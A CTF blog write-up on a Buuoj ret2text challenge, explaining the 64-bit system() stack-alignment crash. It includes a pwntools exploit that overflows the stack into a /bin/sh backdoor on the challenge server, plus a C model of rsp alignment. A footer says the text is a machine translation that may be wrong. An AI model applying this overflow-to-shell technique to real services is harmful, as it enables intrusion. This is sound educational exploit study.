
[Pwn] Issues that may occur when calling system from a 64-bit ELF on Ubuntu 18

· 2 min read
MuelNova
Pwner who wants to write codes.

Recently, while setting up Ubuntu 18 and testing it, I ran into a problem.

After researching for a long time, I finally solved it and decided to take some notes.

Challenge -- Buuoj -- RIP

Problem

This challenge is a basic stack overflow. There is a backdoor function that directly calls system("/bin/sh"), and no protections are enabled. In theory, overwriting the return address with the backdoor's address should be enough.

Indeed, it worked fine during local testing, but issues arose during remote testing.

Digging further, I found that when a 64-bit ELF on Ubuntu 18 or later calls the system function, stack balance inside libc has to be taken into account: system expects rsp to be 16-byte (0x10) aligned at the point it is called, and reaching the backdoor through an overwritten return address rather than a normal call leaves the stack off by 8 bytes.

Solution

Changing the payload length or performing a stack pivot resolves the issue.

The core idea is to change the stack pointer so that rsp is 16-byte aligned when system is entered.

Here is an example exploit:

```python
from pwn import *
context(log_level='debug', arch='amd64', os='linux')

# sh = process("./pwn1")
sh = remote("node4.buuoj.cn", 29726)

# sh.recvuntil('please input\n')

backdoor_addr = 0x0401186
# payload = b'a'*(0xf+8) + p64(backdoor_addr)  # The obvious idea, but it fails because of the stack alignment issue
# payload = b'a'*0xf + p64(backdoor_addr)  # Exploit 1; not entirely clear why this one works
# payload = b'a'*(0xf+8) + p64(backdoor_addr) + p64(backdoor_addr - 1)  # Exploit 2: backdoor_addr - 1 is a 'retn'; any other gadget that rebalances the stack would do
payload = b'a'*(0xf+8) + p64(backdoor_addr + 1)  # Exploit 3: +1 makes the address that call_system checks 0x10-aligned
"""
It doesn't have to be +1; any adjustment that leaves the stack 16-byte aligned should work. If not, try stack pivoting.
"""
sh.sendline(payload)
sh.interactive()
```
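To make the alignment argument behind the three commented payloads concrete, here is an added example (my own, not code from the original post or from the challenge). It models the System V x86-64 rule that rsp must be a multiple of 16 immediately before a CALL, so a callee sees rsp == 8 (mod 16) at its first instruction, which is what glibc's system relies on when it executes MOVAPS on the stack. It assumes the backdoor function begins with a one-byte `push rbp` (which is why the post's `+1` skips it); the starting rsp value is a constructed sample, not taken from the binary. The last function checks the real invariant in the running process via `__builtin_frame_address(0)`, which on x86-64 holds the saved-rbp slot, i.e. the entry rsp minus 8.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example (not from the original post). Models the x86-64 System V
 * rule the post runs into: rsp is a multiple of 16 right before a CALL,
 * so at a callee's first instruction rsp == 8 (mod 16). glibc's system()
 * assumes this when it executes MOVAPS on a stack slot and faults when it
 * is entered through a crafted RET instead of a normal CALL. */

#define STACK_ALIGN 16u

/* True when an rsp value satisfies the ABI invariant at function entry. */
int entry_rsp_is_aligned(uintptr_t rsp_at_entry)
{
    return (rsp_at_entry % STACK_ALIGN) == 8;
}

/* Apply a sequence of stack operations to rsp and return the result.
 *   'r' : RET       (pops the return address, rsp += 8)
 *   'p' : PUSH rbp  (function prologue, rsp -= 8)
 *   'c' : CALL      (pushes the return address, rsp -= 8)
 * Any other character is ignored so the string may contain spaces. */
uintptr_t rsp_after(uintptr_t rsp, const char *ops)
{
    for (; *ops; ops++) {
        switch (*ops) {
        case 'r': rsp += 8; break;
        case 'p': rsp -= 8; break;
        case 'c': rsp -= 8; break;
        default: break;
        }
    }
    return rsp;
}

/* Given rsp just after the overflowed function's own RET has consumed the
 * overwritten return address, report whether system() would be entered
 * with a correctly aligned stack after the listed operations. */
int system_entry_aligned(uintptr_t rsp_after_overflow_ret, const char *ops)
{
    return entry_rsp_is_aligned(rsp_after(rsp_after_overflow_ret, ops));
}

/* Runtime check of the real invariant: __builtin_frame_address(0) is the
 * saved-rbp slot (entry rsp minus 8), so it is 16-byte aligned whenever
 * this function was reached through a normal CALL. */
__attribute__((noinline)) int caller_obeyed_abi(void)
{
    uintptr_t frame = (uintptr_t)__builtin_frame_address(0);
    return (frame % STACK_ALIGN) == 0;
}

int main(void)
{
    /* Constructed sample value: the overflowed function returned from a
     * normally laid-out frame, so rsp is now a multiple of 16 (not 8 mod 16
     * as a real CALL would leave it). */
    uintptr_t rsp = 0x7ffd2a8c1ee0ULL;

    printf("direct return to backdoor (push rbp; call system): %s\n",
           system_entry_aligned(rsp, "p c") ? "aligned" : "MISALIGNED");
    printf("one extra RET gadget first:                        %s\n",
           system_entry_aligned(rsp, "r p c") ? "aligned" : "MISALIGNED");
    printf("jump past the push (backdoor_addr + 1):            %s\n",
           system_entry_aligned(rsp, "c") ? "aligned" : "MISALIGNED");
    printf("this process's own stack obeys the ABI:            %s\n",
           caller_obeyed_abi() ? "yes" : "no");
    return 0;
}
```

The model shows why the extra `ret` and the `+1` both work: each shifts rsp by 8 relative to the direct return, which is exactly the difference between an address reached by `ret` and one reached by `call`. When debugging this kind of crash in gdb, the same check (`p $rsp & 0xf` at the first instruction of system, expecting 8) tells you immediately whether a MOVAPS fault is an alignment problem rather than a bad address.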

In-depth Analysis

Here I plan to dig into the stack at this point, which will also serve as an initial exploration of gdb.

Oh no, it seems gdb on Ubuntu 18 is not working properly. I'll add more details once it's fixed.

Reference Blogs

Issues with calling system function in some 64-bit glibc payloads

Stack balance issues involved in ret2text

Solving the program coredump issue caused by MOVAPS instruction after upgrading to gcc7.3

Info: This content was generated by ChatGPT and might be wrong or incomplete; refer to the Chinese version if you find something wrong.
